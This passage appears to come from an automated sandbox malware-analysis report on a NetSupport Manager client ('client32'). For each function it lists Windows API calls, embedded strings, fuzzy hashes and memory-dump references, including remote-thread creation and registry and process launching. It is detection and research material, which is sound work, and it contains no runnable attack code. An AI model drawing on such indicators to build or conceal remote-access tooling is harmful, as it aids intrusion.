                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CriticalLibrarySection$AddressEnterErrorFreeLastLeaveLoadProcwsprintf
                                                                                                                                                                • String ID: Error. IPC(%s) = %s$GetProcessId$Kernel32.dll$PostMessage WMCLOSE to s%d (%d) ret %d$Session\%u\NSMWClass$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 3106348785-779848922
                                                                                                                                                                • Opcode ID: 1edc8b8ba17f787b1558616dea048ccbe520c70343026f8c3c0ffca6a3f3d5cc
                                                                                                                                                                • Instruction ID: 7ca66135e65bf27062c8b0cf46d1fba60d66d0776981d3ee52a2c48e780759e3
                                                                                                                                                                • Opcode Fuzzy Hash: 1edc8b8ba17f787b1558616dea048ccbe520c70343026f8c3c0ffca6a3f3d5cc
                                                                                                                                                                • Instruction Fuzzy Hash: 0E719CB1D012699FDB50DF66CD88A9EFBB5FB48304F9541EAD819A7211DB306E80CF90
                                                                                                                                                                Function 110EB120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • wsprintfA.USER32 ref: 110EB1B8
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110EB212
                                                                                                                                                                • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                                                                                • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                                                                                • API String ID: 3451743168-2289091950
                                                                                                                                                                • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                                                                                • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                                                                                                • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                                                                                • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                                                                                                Function 111254C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 110libraryloaderthreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,00000001,00000000,?,?,?,11107655,00000000,000000FF), ref: 111254DA
                                                                                                                                                                • GetCurrentProcess.KERNEL32(FFFFFFFF,001F0FFF,00000000,00000000,?,?,11107655,00000000,000000FF), ref: 111254F6
                                                                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000,?,?,11107655,00000000,000000FF), ref: 111254FD
                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,?,11107655,00000000,000000FF), ref: 11125500
                                                                                                                                                                • GetExitCodeProcess.KERNEL32(FFFFFFFF,?), ref: 11125519
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ExitProcess), ref: 11125532
                                                                                                                                                                • CreateRemoteThread.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,00000000,?), ref: 11125551
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1112555D
                                                                                                                                                                • TerminateProcess.KERNEL32(000000FF,00000000), ref: 11125568
                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,?,?,11107655), ref: 111255CF
                                                                                                                                                                • SetLastError.KERNEL32(0000042B,?,?,11107655), ref: 111255DD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Handle$CurrentErrorLast$AddressCloseCodeCreateDuplicateExitModuleProcRemoteTerminateThread
                                                                                                                                                                • String ID: ExitProcess$Kernel32
                                                                                                                                                                • API String ID: 109174691-3456457508
                                                                                                                                                                • Opcode ID: 426b738c6fbfa5f74dcb21ca8823c9be9917486caf471f8f95e9508255649407
                                                                                                                                                                • Instruction ID: f8e98d51da87ee85686525c21cd9091351168c3488a54b7e022490e4144d2367
                                                                                                                                                                • Opcode Fuzzy Hash: 426b738c6fbfa5f74dcb21ca8823c9be9917486caf471f8f95e9508255649407
                                                                                                                                                                • Instruction Fuzzy Hash: 21318F75E10229BBDB159FB5C888A9EFB79EF48725F114155F822E3240DB709E00CBA0
                                                                                                                                                                Function 111352B0 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 260windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • _memset.LIBCMT ref: 11135335
                                                                                                                                                                • LoadIconA.USER32(00000000,00000455), ref: 11135403
                                                                                                                                                                • _strncpy.LIBCMT ref: 11135425
                                                                                                                                                                • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,59FD48C0,00000000,1102E392,00000001), ref: 11135436
                                                                                                                                                                • LoadIconA.USER32(00000000,0000045C), ref: 11135456
                                                                                                                                                                • GetWindowTextA.USER32(000802A6,?,00000180), ref: 11135478
                                                                                                                                                                • wsprintfA.USER32 ref: 111354F4
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                • wsprintfA.USER32 ref: 1113552C
                                                                                                                                                                • wsprintfA.USER32 ref: 1113558D
                                                                                                                                                                • wsprintfA.USER32 ref: 111355E8
                                                                                                                                                                • Shell_NotifyIconA.SHELL32(1102D57D,000001E8,00000001,00000000,59FD48C0,00000000,1102E392,00000001), ref: 11135623
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                                                                                                                • String ID: %s$%s%s$562258$Client$SysTray
                                                                                                                                                                • API String ID: 1881589080-441279933
                                                                                                                                                                • Opcode ID: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                                                                                                • Instruction ID: 2c8920b03c090074b43ba546e334978a2e83067bba728106ef80608c6d9e13b6
                                                                                                                                                                • Opcode Fuzzy Hash: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                                                                                                • Instruction Fuzzy Hash: EAA15CB1D042159FDB62CF74CC50BAEF7B9BB44719F4045ACE829A7284EB71AA44CF50
                                                                                                                                                                Function 11027960 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 139processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                  • Part of subcall function 110B7920: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7946
                                                                                                                                                                  • Part of subcall function 110B7920: GetProcAddress.KERNEL32(00000000), ref: 110B794D
                                                                                                                                                                  • Part of subcall function 110B7920: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7963
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                  • Part of subcall function 110ED1A0: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                                                                                                • GetSystemMetrics.USER32(00000043), ref: 11027A34
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 11027A5B
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                  • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                • wsprintfA.USER32 ref: 11027A85
                                                                                                                                                                • _memset.LIBCMT ref: 11027AC0
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027B15
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11027B2C
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11027B35
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcess_memsetwsprintf$AddressCurrentMetricsNameProcSystemVersion__wcstoi64_strncpy
                                                                                                                                                                • String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
                                                                                                                                                                • API String ID: 1724249554-531500863
                                                                                                                                                                • Opcode ID: a3df32cb051b6ffef0dbddb9e1d9e6afedb1f6be11d8f1515118bc7fc445a0ec
                                                                                                                                                                • Instruction ID: 8b64ee8515715f9a467a382f1722012f052f9773485b67a77751752c4120a0ae
                                                                                                                                                                • Opcode Fuzzy Hash: a3df32cb051b6ffef0dbddb9e1d9e6afedb1f6be11d8f1515118bc7fc445a0ec
                                                                                                                                                                • Instruction Fuzzy Hash: AE412C75E4021EAAEB11DBB0CC95FE9F7B8EB14708F5041D8EA19A71C0EB71B540CB54
                                                                                                                                                                Function 110035D0 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 11003611
                                                                                                                                                                  • Part of subcall function 11142510: SetBkColor.GDI32(?,00000000), ref: 11142524
                                                                                                                                                                  • Part of subcall function 11142510: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11142539
                                                                                                                                                                  • Part of subcall function 11142510: SetBkColor.GDI32(?,00000000), ref: 11142541
                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 11003625
                                                                                                                                                                • GetStockObject.GDI32(00000007), ref: 11003630
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1100363B
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1100364C
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 1100365C
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003673
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100368A
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 110036A1
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 110036BE
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 110036D5
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110036EC
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003703
                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 11003720
                                                                                                                                                                • Rectangle.GDI32(?,?,00000001,?,?), ref: 1100373A
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1100374E
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 11003758
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100375E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3698065672-0
                                                                                                                                                                • Opcode ID: 85c92a5ddb3fa2c2e396d8f91cdfef8aadc43ee42c682f1723c19db0d879a3f5
                                                                                                                                                                • Instruction ID: 0acc8f431d394271bb16371b25c06287c3fc210f7a5d9f44f9263931014851e0
                                                                                                                                                                • Opcode Fuzzy Hash: 85c92a5ddb3fa2c2e396d8f91cdfef8aadc43ee42c682f1723c19db0d879a3f5
                                                                                                                                                                • Instruction Fuzzy Hash: 3C517DB5900209AFD714EFA5CC85EFBF7BCEB98704F104A18E612A7291D670B945CBA1
                                                                                                                                                                Function 111117D0 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 291COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __localtime64__time64
                                                                                                                                                                • String ID: ?$EVAL$IsA()$authcode$currentver$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$expiredver$expiryday$expirymonth$expiryyear$startday$startmonth$startyear
                                                                                                                                                                • API String ID: 3099643277-245371475
                                                                                                                                                                • Opcode ID: 95701a4e29cf4d46864c7dc7deb441c072c18aa3f1f64dcc333247a8aeecb6d2
                                                                                                                                                                • Instruction ID: ed969fd491221d6f9ddc632703b46658f720054547a2bb076cdef45b618babfb
                                                                                                                                                                • Opcode Fuzzy Hash: 95701a4e29cf4d46864c7dc7deb441c072c18aa3f1f64dcc333247a8aeecb6d2
                                                                                                                                                                • Instruction Fuzzy Hash: 8AB1E336D0428A9BDB01CFB5DE94BDDFBF5AF14358F144468D8117B284EB32AA08CB61
                                                                                                                                                                Function 11131250 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 241COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
